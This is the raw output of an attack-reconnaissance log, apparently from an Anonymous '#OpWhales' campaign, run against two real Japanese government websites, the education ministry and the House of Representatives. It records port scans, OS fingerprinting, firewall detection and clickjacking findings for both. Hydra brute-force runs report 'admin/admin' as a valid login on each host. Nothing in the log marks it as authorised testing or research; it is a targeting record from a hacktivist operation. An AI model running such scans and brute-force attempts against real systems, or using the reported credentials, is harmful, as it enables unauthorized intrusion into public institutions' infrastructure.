Anonymous #OpWhales JTSEC full Recon #2

1. #######################################################################################################################################
2. Hostname www.mext.go.jp ISP Unknown
3. Continent Unknown Flag
4. JP
5. Country Japan Country Code JP
6. Region Unknown Local time 09 Jan 2018 06:54 JST
7. City Unknown Latitude 36
8. IP Address (IPv6) 2001:240:165:1::211 Longitude 138
9. #######################################################################################################################################
10. [i] Scanning Site: http://202.232.190.211
11.  
12.  
13.  
14. B A S I C I N F O
15. ====================
16.  
17.  
18. [+] Site Title: 文部科学省ホームページ
19. [+] IP address: 202.232.190.211
20. [+] Web Server: Apache
21. [+] CMS: Could Not Detect
22. [+] Cloudflare: Not Detected
23. [+] Robots File: Could NOT Find robots.txt!
24.  
25.  
26.  
27.  
28. H T T P H E A D E R S
29. =======================
30.  
31.  
32. [i] HTTP/1.1 200 OK
33. [i] Date: Mon, 08 Jan 2018 22:00:52 GMT
34. [i] Server: Apache
35. [i] Last-Modified: Mon, 08 Jan 2018 14:01:12 GMT
36. [i] ETag: "5c813f5-cf3c-562443b13ba00"
37. [i] Accept-Ranges: bytes
38. [i] Content-Length: 53052
39. [i] Connection: close
40. [i] Content-Type: text/html
41.  
42. [!] IP Address : 202.232.190.211
43. [!] Server: Apache
44. [-] Clickjacking protection is not in place.
45. [!] www.mext.go.jp doesn't seem to use a CMS
46. [+] Honeypot Probabilty: 0%
47. ----------------------------------------
48. API count exceeded
49. ----------------------------------------
50.  
51. [+] DNS Records
52. dns-c.iij.ad.jp. (210.130.1.15) AS2497 Internet Initiative Inc. Japan
53. dns-b.iij.ad.jp. (202.232.2.14) AS2497 Internet Initiative Inc. Japan
54.  
55. [+] Host Records (A)
56. www.mext.go.jpHTTP: (202.232.190.211) AS2497 Internet Initiative Inc. Japan
57.  
58. [+] TXT Records
59.  
60. [+] DNS Map: https://dnsdumpster.com/static/map/mext.go.jp.png
61.  
62. [>] Initiating 3 intel modules
63. [>] Loading Alpha module (1/3)
64. [>] Beta module deployed (2/3)
65. [>] Gamma module initiated (3/3)
66. ====================================================================================
67. RUNNING NSLOOKUP
68. ====================================================================================
69. ** server can't find 211.190.232.202.in-addr.arpa: NXDOMAIN
70.  
71. Host 211.190.232.202.in-addr.arpa. not found: 3(NXDOMAIN)
72. ====================================================================================
73. CHECKING OS FINGERPRINT
74. ====================================================================================
75.  
76. Xprobe2 v.0.3 Copyright (c) 2002-2005 fyodor@o0o.nu, ofir@sys-security.com, meder@o0o.nu
77.  
78. [+] Target is 202.232.190.211
79. [+] Loading modules.
80. [+] Following modules are loaded:
81. [x] [1] ping:icmp_ping - ICMP echo discovery module
82. [x] [2] ping:tcp_ping - TCP-based ping discovery module
83. [x] [3] ping:udp_ping - UDP-based ping discovery module
84. [x] [4] infogather:ttl_calc - TCP and UDP based TTL distance calculation
85. [x] [5] infogather:portscan - TCP and UDP PortScanner
86. [x] [6] fingerprint:icmp_echo - ICMP Echo request fingerprinting module
87. [x] [7] fingerprint:icmp_tstamp - ICMP Timestamp request fingerprinting module
88. [x] [8] fingerprint:icmp_amask - ICMP Address mask request fingerprinting module
89. [x] [9] fingerprint:icmp_port_unreach - ICMP port unreachable fingerprinting module
90. [x] [10] fingerprint:tcp_hshake - TCP Handshake fingerprinting module
91. [x] [11] fingerprint:tcp_rst - TCP RST fingerprinting module
92. [x] [12] fingerprint:smb - SMB fingerprinting module
93. [x] [13] fingerprint:snmp - SNMPv2c fingerprinting module
94. [+] 13 modules registered
95. [+] Initializing scan engine
96. [+] Running scan engine
97. [-] ping:tcp_ping module: no closed/open TCP ports known on 202.232.190.211. Module test failed
98. [-] ping:udp_ping module: no closed/open UDP ports known on 202.232.190.211. Module test failed
99. [-] No distance calculation. 202.232.190.211 appears to be dead or no ports known
100. [+] Host: 202.232.190.211 is down (Guess probability: 0%)
101. [+] Cleaning up scan engine
102. [+] Modules deinitialized
103. [+] Execution completed.
104.  
105. ====================================================================================
106. RUNNING TCP PORT SCAN
107. ====================================================================================
108.  
109. Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-08 17:16 EST
110. Nmap scan report for 202.232.190.211
111. Host is up (0.17s latency).
112. Not shown: 472 filtered ports
113. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
114. PORT STATE SERVICE
115. 80/tcp open http
116.  
117. Nmap done: 1 IP address (1 host up) scanned in 7.21 seconds
118.  
119. ====================================================================================
120. RUNNING INTRUSIVE SCANS
121. ====================================================================================
122. + -- --=[Port 21 closed... skipping.
123. + -- --=[Port 22 closed... skipping.
124. + -- --=[Port 23 closed... skipping.
125. + -- --=[Port 25 closed... skipping.
126. + -- --=[Port 53 closed... skipping.
127. + -- --=[Port 79 closed... skipping.
128. + -- --=[Port 80 opened... running tests...
129. ====================================================================================
130. CHECKING FOR WAF
131. ====================================================================================
132.  
133. ^ ^
134. _ __ _ ____ _ __ _ _ ____
135. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
136. | V V // o // _/ | V V // 0 // 0 // _/
137. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
138. <
139. ...'
140.  
141. WAFW00F - Web Application Firewall Detection Tool
142.  
143. By Sandro Gauci && Wendel G. Henrique
144.  
145. Checking http://202.232.190.211
146. Generic Detection results:
147. The site http://202.232.190.211 seems to be behind a WAF or some sort of security solution
148. Reason: Blocking is being done at connection/packet level.
149. Number of requests: 11
150.  
151. ====================================================================================
152. GATHERING HTTP INFO
153. ====================================================================================
154. http://202.232.190.211 [200 OK] Apache, Country[JAPAN][JP], HTTPServer[Apache], IP[202.232.190.211], JQuery[1.8.3], Script[text/javascript], Title[文部科学省ホームページ]
155.  
156. __ ______ _____
157. \ \/ / ___|_ _|
158. \ /\___ \ | |
159. / \ ___) || |
160. /_/\_|____/ |_|
161.  
162. + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
163. + -- --=[Target: 202.232.190.211:80
164. + -- --=[Site not vulnerable to Cross-Site Tracing!
165. + -- --=[Site not vulnerable to Host Header Injection!
166. + -- --=[Site vulnerable to Cross-Frame Scripting!
167. + -- --=[Site vulnerable to Clickjacking!
168.  
169. HTTP/1.1 405 Method Not Allowed
170. Date: Mon, 08 Jan 2018 22:16:21 GMT
171. Server: Apache
172. Allow:
173. Content-Length: 223
174. Content-Type: text/html; charset=iso-8859-1
175.  
176. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
177. <html><head>
178. <title>405 Method Not Allowed</title>
179. </head><body>
180. <h1>Method Not Allowed</h1>
181. <p>The requested method TRACE is not allowed for the URL /.</p>
182. </body></html>
183.  
184. HTTP/1.1 200 OK
185. Date: Mon, 08 Jan 2018 22:16:23 GMT
186. Server: Apache
187. Last-Modified: Mon, 08 Jan 2018 14:01:12 GMT
188. ETag: "5c813f5-cf3c-562443b13ba00"
189. Accept-Ranges: bytes
190. Content-Length: 53052
191. Content-Type: text/html
192. ====================================================================================
193. CHECKING HTTP HEADERS
194. ====================================================================================
195. + -- --=[Checking if X-Content options are enabled on 202.232.190.211...
196.  
197. + -- --=[Checking if X-Frame options are enabled on 202.232.190.211...
198.  
199. + -- --=[Checking if X-XSS-Protection header is enabled on 202.232.190.211...
200.  
201. + -- --=[Checking HTTP methods on 202.232.190.211...
202.  
203. + -- --=[Checking if TRACE method is enabled on 202.232.190.211...
204.  
205. + -- --=[Checking for META tags on 202.232.190.211...
206. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
207. <meta http-equiv="Content-Style-Type" content="text/css" />
208. <meta http-equiv="Content-Script-Type" content="text/javascript" />
209. <meta name="viewport" content="width=device-width" />
210. <meta name="description" content="" />
211. <meta name="keywords" content="" />
212.  
213. + -- --=[Checking for open proxy on 202.232.190.211...
214. </div>
215. <!--/footer_utility-->
216. </div>
217. <span class="footer_copyright" lang="en">Copyright (C) Ministry of Education, Culture, Sports, Science and Technology</span>
218. </div>
219. </div>
220. <!-- footer_area END -->
221.  
222. </body>
223. </html>
224. + -- --=[Enumerating software on 202.232.190.211...
225. Server: Apache
226.  
227. + -- --=[Checking if Strict-Transport-Security is enabled on 202.232.190.211...
228.  
229. + -- --=[Checking for Flash cross-domain policy on 202.232.190.211...
230. <dd>電話番号：03-5253-4111(代表)　050-3772-4111 (IP 電話代表)</dd>
231. <dd><a href="/new_map/index.htm">案内図</a></dd>
232. </dl>
233. </div><!--/footer-->
234. <p id="copyright" xml:lang="ja" lang="en">Copyright (C) Ministry of Education, Culture, Sports, Science and Technology</p>
235.  
236. </div>
237. </div>
238. </body>
239. </html>
240. + -- --=[Checking for Silverlight cross-domain policy on 202.232.190.211...
241. <dd>電話番号：03-5253-4111(代表)　050-3772-4111 (IP 電話代表)</dd>
242. <dd><a href="/new_map/index.htm">案内図</a></dd>
243. </dl>
244. </div><!--/footer-->
245. <p id="copyright" xml:lang="ja" lang="en">Copyright (C) Ministry of Education, Culture, Sports, Science and Technology</p>
246.  
247. </div>
248. </div>
249. </body>
250. </html>
251. + -- --=[Checking for HTML5 cross-origin resource sharing on 202.232.190.211...
252.  
253. + -- --=[Retrieving robots.txt on 202.232.190.211...
254. <dd>電話番号：03-5253-4111(代表)　050-3772-4111 (IP 電話代表)</dd>
255. <dd><a href="/new_map/index.htm">案内図</a></dd>
256. </dl>
257. </div><!--/footer-->
258. <p id="copyright" xml:lang="ja" lang="en">Copyright (C) Ministry of Education, Culture, Sports, Science and Technology</p>
259.  
260. </div>
261. </div>
262. </body>
263. </html>
264. + -- --=[Retrieving sitemap.xml on 202.232.190.211...
265. <dd>電話番号：03-5253-4111(代表)　050-3772-4111 (IP 電話代表)</dd>
266. <dd><a href="/new_map/index.htm">案内図</a></dd>
267. </dl>
268. </div><!--/footer-->
269. <p id="copyright" xml:lang="ja" lang="en">Copyright (C) Ministry of Education, Culture, Sports, Science and Technology</p>
270.  
271. </div>
272. </div>
273. </body>
274. </html>
275. + -- --=[Checking cookie attributes on 202.232.190.211...
276.  
277. + -- --=[Checking for ASP.NET Detailed Errors on 202.232.190.211...
278. <title>404error：文部科学省</title>
279. <body class="error404">
280. <noscript><ul id="headerNoscript"><li><a href="/error/fontsize.html">文字サイズを変更する方法</a></li></ul></noscript>
281. <dd><a href="/">トップ</a>&nbsp;&gt;&nbsp;404error</dd>
282. <title>404error：文部科学省</title>
283. <body class="error404">
284. <noscript><ul id="headerNoscript"><li><a href="/error/fontsize.html">文字サイズを変更する方法</a></li></ul></noscript>
285. <dd><a href="/">トップ</a>&nbsp;&gt;&nbsp;404error</dd>
286.  
287.  
288. ====================================================================================
289. RUNNING BRUTE FORCE
290. ====================================================================================
291. __________ __ ____ ___
292. \______ \_______ __ ___/ |_ ____ \ \/ /
293. | | _/\_ __ \ | \ __\/ __ \ \ /
294. | | \ | | \/ | /| | \ ___/ / \
295. |______ / |__| |____/ |__| \___ >___/\ \
296. \/ \/ \_/
297.  
298. + -- --=[BruteX v1.7 by 1N3
299. + -- --=[http://crowdshield.com
300.  
301.  
302. ################################### Running Port Scan #################################################################################
303.  
304. Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-08 17:16 EST
305. Nmap scan report for 202.232.190.211
306. Host is up (0.20s latency).
307. Not shown: 25 filtered ports
308. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
309. PORT STATE SERVICE
310. 80/tcp open http
311.  
312. Nmap done: 1 IP address (1 host up) scanned in 5.40 seconds
313.  
314. ################################### Running Brute Force ###############################################################################
315. + -- --=[Port 21 closed... skipping.
316. + -- --=[Port 22 closed... skipping.
317. + -- --=[Port 23 closed... skipping.
318. + -- --=[Port 25 closed... skipping.
319. + -- --=[Port 80 opened... running tests...
320. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
321.  
322. Hydra (http://www.thc.org/thc-hydra) starting at 2018-01-08 17:16:42
323. [DATA] max 1 task per 1 server, overall 1 task, 1496 login tries (l:34/p:44), ~1496 tries per task
324. [DATA] attacking http-get://202.232.190.211:80//
325. [80][http-get] host: 202.232.190.211 login: admin password: admin
326. [STATUS] attack finished for 202.232.190.211 (valid pair found)
327. 1 of 1 target successfully completed, 1 valid password found
328. Hydra (http://www.thc.org/thc-hydra) finished at 2018-01-08 17:16:48
329. + -- --=[Port 110 closed... skipping.
330. + -- --=[Port 139 closed... skipping.
331. + -- --=[Port 162 closed... skipping.
332. + -- --=[Port 389 closed... skipping.
333. + -- --=[Port 443 closed... skipping.
334. + -- --=[Port 445 closed... skipping.
335. + -- --=[Port 512 closed... skipping.
336. + -- --=[Port 513 closed... skipping.
337. + -- --=[Port 514 closed... skipping.
338. + -- --=[Port 993 closed... skipping.
339. + -- --=[Port 1433 closed... skipping.
340. + -- --=[Port 1521 closed... skipping.
341. + -- --=[Port 3306 closed... skipping.
342. + -- --=[Port 3389 closed... skipping.
343. + -- --=[Port 5432 closed... skipping.
344. + -- --=[Port 5900 closed... skipping.
345. + -- --=[Port 5901 closed... skipping.
346. + -- --=[Port 8000 closed... skipping.
347. + -- --=[Port 8080 closed... skipping.
348. + -- --=[Port 8100 closed... skipping.
349. + -- --=[Port 6667 closed... skipping.
350. #######################################################################################################################################
351. Hostname www.shugiin.go.jp ISP NTT PC Communications, Inc. (AS2514)
352. Continent Asia Flag
353. JP
354. Country Japan Country Code JP (JPN)
355. Region 40 Local time 09 Jan 2018 07:32 JST
356. Metropolis Unknown Postal Code 102-0082
357. City Tokyo Latitude 35.685
358. IP Address 210.136.96.36 Longitude 139.751
359. #######################################################################################################################################
360. [i] Scanning Site: http://210.136.96.36
361.  
362.  
363.  
364. B A S I C I N F O
365. ====================
366.  
367.  
368. [+] Site Title: �O�c�@�g�b�v�y�[�W
369. [+] IP address: 210.136.96.36
370. [+] Web Server: Lotus-Domino
371. [+] CMS: Could Not Detect
372. [+] Cloudflare: Not Detected
373. [+] Robots File: Could NOT Find robots.txt!
374.  
375. [i] Scanning Site: http://210.136.96.36
376.  
377.  
378.  
379. B A S I C I N F O
380. ====================
381.  
382.  
383. [+] Site Title: �O�c�@�g�b�v�y�[�W
384. [+] IP address: 210.136.96.36
385. [+] Web Server: Lotus-Domino
386. [+] CMS: Could Not Detect
387. [+] Cloudflare: Not Detected
388. [+] Robots File: Could NOT Find robots.txt!
389.  
390. [i] HTTP/1.1 302 Found
391. [i] Server: Lotus-Domino
392. [i] Date: Mon, 08 Jan 2018 22:57:34 GMT
393. [i] Connection: close
394. [i] Location: http://www.shugiin.go.jp/internet/index.nsf/html/index.htm
395. [i] Content-Length: 0
396. [i] Set-Cookie: Coyote-2-246088d2=3b01a8c0:0; path=/
397. [i] HTTP/1.1 200 OK
398. [i] Server: Lotus-Domino
399. [i] Date: Mon, 08 Jan 2018 22:57:10 GMT
400. [i] Connection: close
401. [i] Last-Modified: Fri, 05 Jan 2018 03:37:57 GMT
402. [i] Content-Type: text/html; charset=Shift_JIS
403. [i] Content-Length: 32558
404. [i] X-Content-Type-Option: nosniff
405. [i] ETag: W/"MTAtODA4Qy00OTI1N0RDRDAwMDBEMDgxLTQ5MjU4MjBDMDAxM0Y0MTYtMA=="
406. [i] Set-Cookie: Coyote-2-246088d2=3a01a8c0:0; path=/
407.  
408.  
409. [i] HTTP/1.1 302 Found
410. [i] Server: Lotus-Domino
411. [i] Date: Mon, 08 Jan 2018 22:57:34 GMT
412. [i] Connection: close
413. [i] Location: http://www.shugiin.go.jp/internet/index.nsf/html/index.htm
414. [i] Content-Length: 0
415. [i] Set-Cookie: Coyote-2-246088d2=3b01a8c0:0; path=/
416. [i] HTTP/1.1 200 OK
417. [i] Server: Lotus-Domino
418. [i] Date: Mon, 08 Jan 2018 22:57:10 GMT
419. [i] Connection: close
420. [i] Last-Modified: Fri, 05 Jan 2018 03:37:57 GMT
421. [i] Content-Type: text/html; charset=Shift_JIS
422. [i] Content-Length: 32558
423. [i] X-Content-Type-Option: nosniff
424. [i] ETag: W/"MTAtODA4Qy00OTI1N0RDRDAwMDBEMDgxLTQ5MjU4MjBDMDAxM0Y0MTYtMA=="
425. [i] Set-Cookie: Coyote-2-246088d2=3a01a8c0:0; path=/
426. ====================================================================================
427. RUNNING NSLOOKUP
428. ====================================================================================
429. 36.96.136.210.in-addr.arpa name = www.shugiin.go.jp.
430.  
431. Authoritative answers can be found from:
432.  
433. 36.96.136.210.in-addr.arpa domain name pointer www.shugiin.go.jp.
434. ====================================================================================
435. CHECKING OS FINGERPRINT
436. ====================================================================================
437.  
438. Xprobe2 v.0.3 Copyright (c) 2002-2005 fyodor@o0o.nu, ofir@sys-security.com, meder@o0o.nu
439.  
440. [+] Target is 210.136.96.36
441. [+] Loading modules.
442. [+] Following modules are loaded:
443. [x] [1] ping:icmp_ping - ICMP echo discovery module
444. [x] [2] ping:tcp_ping - TCP-based ping discovery module
445. [x] [3] ping:udp_ping - UDP-based ping discovery module
446. [x] [4] infogather:ttl_calc - TCP and UDP based TTL distance calculation
447. [x] [5] infogather:portscan - TCP and UDP PortScanner
448. [x] [6] fingerprint:icmp_echo - ICMP Echo request fingerprinting module
449. [x] [7] fingerprint:icmp_tstamp - ICMP Timestamp request fingerprinting module
450. [x] [8] fingerprint:icmp_amask - ICMP Address mask request fingerprinting module
451. [x] [9] fingerprint:icmp_port_unreach - ICMP port unreachable fingerprinting module
452. [x] [10] fingerprint:tcp_hshake - TCP Handshake fingerprinting module
453. [x] [11] fingerprint:tcp_rst - TCP RST fingerprinting module
454. [x] [12] fingerprint:smb - SMB fingerprinting module
455. [x] [13] fingerprint:snmp - SNMPv2c fingerprinting module
456. [+] 13 modules registered
457. [+] Initializing scan engine
458. [+] Running scan engine
459. [-] ping:tcp_ping module: no closed/open TCP ports known on 210.136.96.36. Module test failed
460. [-] ping:udp_ping module: no closed/open UDP ports known on 210.136.96.36. Module test failed
461. [-] No distance calculation. 210.136.96.36 appears to be dead or no ports known
462. [+] Host: 210.136.96.36 is down (Guess probability: 0%)
463. [+] Cleaning up scan engine
464. [+] Modules deinitialized
465. [+] Execution completed.
466.  
467. ====================================================================================
468. PINGING HOST
469. ====================================================================================
470. PING 210.136.96.36 (210.136.96.36) 56(84) bytes of data.
471.  
472. --- 210.136.96.36 ping statistics ---
473. 1 packets transmitted, 0 received, 100% packet loss, time 0ms
474.  
475.  
476. ====================================================================================
477. RUNNING TCP PORT SCAN
478. ====================================================================================
479.  
480. Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-08 17:35 EST
481. Nmap scan report for www.shugiin.go.jp (210.136.96.36)
482. Host is up (0.19s latency).
483. Not shown: 472 filtered ports
484. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
485. PORT STATE SERVICE
486. 80/tcp open http
487.  
488. Nmap done: 1 IP address (1 host up) scanned in 7.39 seconds
489.  
490. ====================================================================================
491. RUNNING INTRUSIVE SCANS
492. ====================================================================================
493. + -- --=[Port 21 closed... skipping.
494. + -- --=[Port 22 closed... skipping.
495. + -- --=[Port 23 closed... skipping.
496. + -- --=[Port 25 closed... skipping.
497. + -- --=[Port 53 closed... skipping.
498. + -- --=[Port 79 closed... skipping.
499. + -- --=[Port 80 opened... running tests...
500. ====================================================================================
501. CHECKING FOR WAF
502. ====================================================================================
503.  
504. ^ ^
505. _ __ _ ____ _ __ _ _ ____
506. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
507. | V V // o // _/ | V V // 0 // 0 // _/
508. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
509. <
510. ...'
511.  
512. WAFW00F - Web Application Firewall Detection Tool
513.  
514. By Sandro Gauci && Wendel G. Henrique
515.  
516. Checking http://210.136.96.36
517. Generic Detection results:
518. The site http://210.136.96.36 seems to be behind a WAF or some sort of security solution
519. Reason: Blocking is being done at connection/packet level.
520. Number of requests: 11
521.  
522. ====================================================================================
523. GATHERING HTTP INFO
524. ====================================================================================
525. http://210.136.96.36 [302 Found] Cookies[Coyote-2-246088d2], Country[JAPAN][JP], HTTPServer[Lotus-Domino], IP[210.136.96.36], Lotus-Domino, RedirectLocation[http://www.shugiin.go.jp/internet/index.nsf/html/index.htm]
526. http://www.shugiin.go.jp/internet/index.nsf/html/index.htm [200 OK] Cookies[Coyote-2-246088d2], Country[JAPAN][JP], HTTPServer[Lotus-Domino], IP[210.136.96.36], Lotus-Domino, MetaGenerator[MSHTML 8.00.7601.18305], Script[text/javascript], Title[�O�c�@�g�b�v�y�[�W], UncommonHeaders[x-content-type-option]
527.  
528. __ ______ _____
529. \ \/ / ___|_ _|
530. \ /\___ \ | |
531. / \ ___) || |
532. /_/\_|____/ |_|
533.  
534. + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
535. + -- --=[Target: 210.136.96.36:80
536. + -- --=[Site not vulnerable to Cross-Site Tracing!
537. + -- --=[Site not vulnerable to Host Header Injection!
538. + -- --=[Site vulnerable to Cross-Frame Scripting!
539. + -- --=[Site vulnerable to Clickjacking!
540.  
541. HTTP/1.1 405 Method Not Allowed
542. Server: Lotus-Domino
543. Date: Mon, 08 Jan 2018 22:36:21 GMT
544. Connection: close
545. Pragma: no-cache
546. Cache-Control: no-cache
547. Expires: Mon, 08 Jan 2018 22:36:21 GMT
548. Content-Type: text/html
549. Content-Length: 165
550. Set-Cookie: Coyote-2-246088d2=3b01a8c0:0; path=/
551.  
552.  
553. HTTP/1.1 302 Found
554. Server: Lotus-Domino
555. Date: Mon, 08 Jan 2018 22:36:23 GMT
556. Connection: close
557. Location: http://www.shugiin.go.jp/internet/index.nsf/html/index.htm
558. Content-Length: 0
559. Set-Cookie: Coyote-2-246088d2=3b01a8c0:0; path=/
560.  
561.  
562.  
563.  
564.  
565. ====================================================================================
566. CHECKING HTTP HEADERS
567. ====================================================================================
568. + -- --=[Checking if X-Content options are enabled on 210.136.96.36...
569.  
570. + -- --=[Checking if X-Frame options are enabled on 210.136.96.36...
571.  
572. + -- --=[Checking if X-XSS-Protection header is enabled on 210.136.96.36...
573.  
574. + -- --=[Checking HTTP methods on 210.136.96.36...
575. HTTP/1.1 405 Method Not Allowed
576.  
577. + -- --=[Checking if TRACE method is enabled on 210.136.96.36...
578.  
579. + -- --=[Checking for META tags on 210.136.96.36...
580.  
581. + -- --=[Checking for open proxy on 210.136.96.36...
582. <LI><A tabIndex=936 href="/internet/itdb_rchome.nsf/html/rchome/Shiryo/index.htm">�����Ǎ쐬����</A></LI>
583. <LI><A tabIndex=937 href="/internet/itdb_annai.nsf/html/statics/shiryo/senkyolist.htm">�O�c�@�c�����I���ꗗ</A></LI>
584. <LI><A tabIndex=938 href="/internet/itdb_annai.nsf/html/statics/shiryo/senkyoseido_index.html">�O�c�@�I�����x�Ɋւ��钲����</A></LI>
585. <LI><A tabIndex=939 href="/internet/itdb_annai.nsf/html/statics/shiryo/taii_index.html">�V�c�̑ވʓ��ɂ‚��Ă̗��@�{�̑Ή�</A></LI>
586. <LI><A tabIndex=940 href="/internet/itdb_annai.nsf/html/statics/shiryo/shiryo.html">���̑�������</A></LI></UL></UL>
587. <UL id=SideBanner2><LI class="SideBannerLi"><A tabindex="952" href="/internet/itdb_annai.nsf/html/statics/saiyo/index.html"><IMG src="images/jinjika2.jpg/$File/jinjika2.jpg" width=250 height=43 alt="�l���ۍ̗p�����ւ̃A�N�Z�X�{�^��"></A></LI>
588. <LI class="SideBannerLi"><A tabindex="952" href="https://www.youtube.com/channel/UCppg061zUuuEbmyJPGuc_BA" target="blank" title="�O�c�@�����ǃ`�����l���@�ʃE�B���h�E�ŊJ���܂�"><IMG src="images/jimuchanlink.jpg/$File/jimuchanlink.jpg" width=250 height=43 alt="�O�c�@�����ǃ`�����l���ւ̃A�N�Z�X�{�^��"></A></LI>
589. <LI class="SideBannerLi"><A tabindex="951" href="http://warp.da.ndl.go.jp/info:ndljp/pid/3856371/naiic.go.jp/index.html" target="blank" title="����̒��T�C�g�@�ʃE�B���h�E�ŊJ���܂�"><IMG src="images/jikocho.jpg/$File/jikocho.jpg" width=250 height=43 alt="����̒��z�[���y�[�W�ւ̃A�N�Z�X�{�^��"></A></LI><LI class="SideBannerLi"><A tabindex="952" href="/internet/itdb_annai.nsf/html/statics/linksyuu.htm"><IMG src="images/kanrenlink.jpg/$File/kanrenlink.jpg" width=250 height=43 alt="�֘A�����N�ւ̃A�N�Z�X�{�^��"></A></LI>
590. </DIV><DIV id=ClearArea></DIV></DIV><DIV id=FooterBlock><UL id=FooterLine1><LI><A tabIndex=1001 title=�z�[���y�[�W�ɂ‚��� href="/internet/itdb_annai.nsf/html/statics/guide.htm">�z�[���y�[�W�ɂ‚���</A></LI><LI><A tabIndex=1002 title=Web�A�N�Z�V�r���e�B href="/internet/itdb_annai.nsf/html/statics/accessibility.htm">Web�A�N�Z�V�r���e�B</A></LI><LI><A tabIndex=1003 title=�����N�E���쌠���ɂ‚��� href="/internet/itdb_annai.nsf/html/statics/link.html">�����N�E���쌠���ɂ‚���</A></LI><LI><A tabIndex=1004 title=���₢���킹 href="/internet/itdb_annai.nsf/html/statics/mail.htm">���₢���킹</A></LI></UL><DIV id=FooterLine2>�O�c�@<BR><ADDRESS>��100-0014 �����s�����c���i�c��1-7-1</ADDRESS>�d�b�i���\�j03-3581-5111<BR><A tabIndex=1005 href="/internet/itdb_annai.nsf/html/statics/kokkaimap.htm">�ē��}</A><P>Copyright &copy; 2014 Shugiin All Rights Reserved.</P></DIV></DIV></BODY></HTML>
591.  
592.  
593. + -- --=[Enumerating software on 210.136.96.36...
594. Server: Lotus-Domino
595. Location: http://www.shugiin.go.jp/internet/index.nsf/html/index.htm
596.  
597. + -- --=[Checking if Strict-Transport-Security is enabled on 210.136.96.36...
598.  
599. + -- --=[Checking for Flash cross-domain policy on 210.136.96.36...
600. <HTML><HEAD><TITLE>Unable to Process Request</TITLE></HEAD><BODY><P>Http Status Code: 404</P><P>Reason: File not found or unable to read file</P></BODY></HTML>
601. + -- --=[Checking for Silverlight cross-domain policy on 210.136.96.36...
602. <HTML><HEAD><TITLE>Unable to Process Request</TITLE></HEAD><BODY><P>Http Status Code: 404</P><P>Reason: File not found or unable to read file</P></BODY></HTML>
603. + -- --=[Checking for HTML5 cross-origin resource sharing on 210.136.96.36...
604.  
605. + -- --=[Retrieving robots.txt on 210.136.96.36...
606. <HTML><HEAD><TITLE>Unable to Process Request</TITLE></HEAD><BODY><P>Http Status Code: 404</P><P>Reason: File not found or unable to read file</P></BODY></HTML>
607. + -- --=[Retrieving sitemap.xml on 210.136.96.36...
608. <HTML><HEAD><TITLE>Unable to Process Request</TITLE></HEAD><BODY><P>Http Status Code: 404</P><P>Reason: File not found or unable to read file</P></BODY></HTML>
609. + -- --=[Checking cookie attributes on 210.136.96.36...
610. Set-Cookie: Coyote-2-246088d2=3a01a8c0:0; path=/
611.  
612. + -- --=[Checking for ASP.NET Detailed Errors on 210.136.96.36...
613.  
614.  
615. ====================================================================================
616. /usr/lib/ruby/2.3.0/rubygems/core_ext/kernel_require.rb:55:in `require': cannot load such file -- nmap/program (LoadError)
617. from /usr/lib/ruby/2.3.0/rubygems/core_ext/kernel_require.rb:55:in `require'
618. from yasuo.rb:25:in `<main>'
619. ====================================================================================
620. SKIPPING FULL NMAP PORT SCAN
621. ====================================================================================
622. ====================================================================================
623. RUNNING BRUTE FORCE
624. ====================================================================================
625. __________ __ ____ ___
626. \______ \_______ __ ___/ |_ ____ \ \/ /
627. | | _/\_ __ \ | \ __\/ __ \ \ /
628. | | \ | | \/ | /| | \ ___/ / \
629. |______ / |__| |____/ |__| \___ >___/\ \
630. \/ \/ \_/
631.  
632. + -- --=[BruteX v1.7 by 1N3
633. + -- --=[http://crowdshield.com
634.  
635.  
636. ################################### Running Port Scan ##############################
637.  
638. Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-08 17:36 EST
639. Nmap scan report for www.shugiin.go.jp (210.136.96.36)
640. Host is up (0.20s latency).
641. Not shown: 25 filtered ports
642. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
643. PORT STATE SERVICE
644. 80/tcp open http
645.  
646. Nmap done: 1 IP address (1 host up) scanned in 5.01 seconds
647.  
648. ################################### Running Brute Force ############################
649.  
650. + -- --=[Port 21 closed... skipping.
651. + -- --=[Port 22 closed... skipping.
652. + -- --=[Port 23 closed... skipping.
653. + -- --=[Port 25 closed... skipping.
654. + -- --=[Port 80 opened... running tests...
655. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
656.  
657. Hydra (http://www.thc.org/thc-hydra) starting at 2018-01-08 17:36:16
658. [DATA] max 1 task per 1 server, overall 1 task, 1496 login tries (l:34/p:44), ~1496 tries per task
659. [DATA] attacking http-get://210.136.96.36:80//
660. [80][http-get] host: 210.136.96.36 login: admin password: admin
661. [STATUS] attack finished for 210.136.96.36 (valid pair found)
662. 1 of 1 target successfully completed, 1 valid password found
663. Hydra (http://www.thc.org/thc-hydra) finished at 2018-01-08 17:36:17
664. ######################################################################################################################################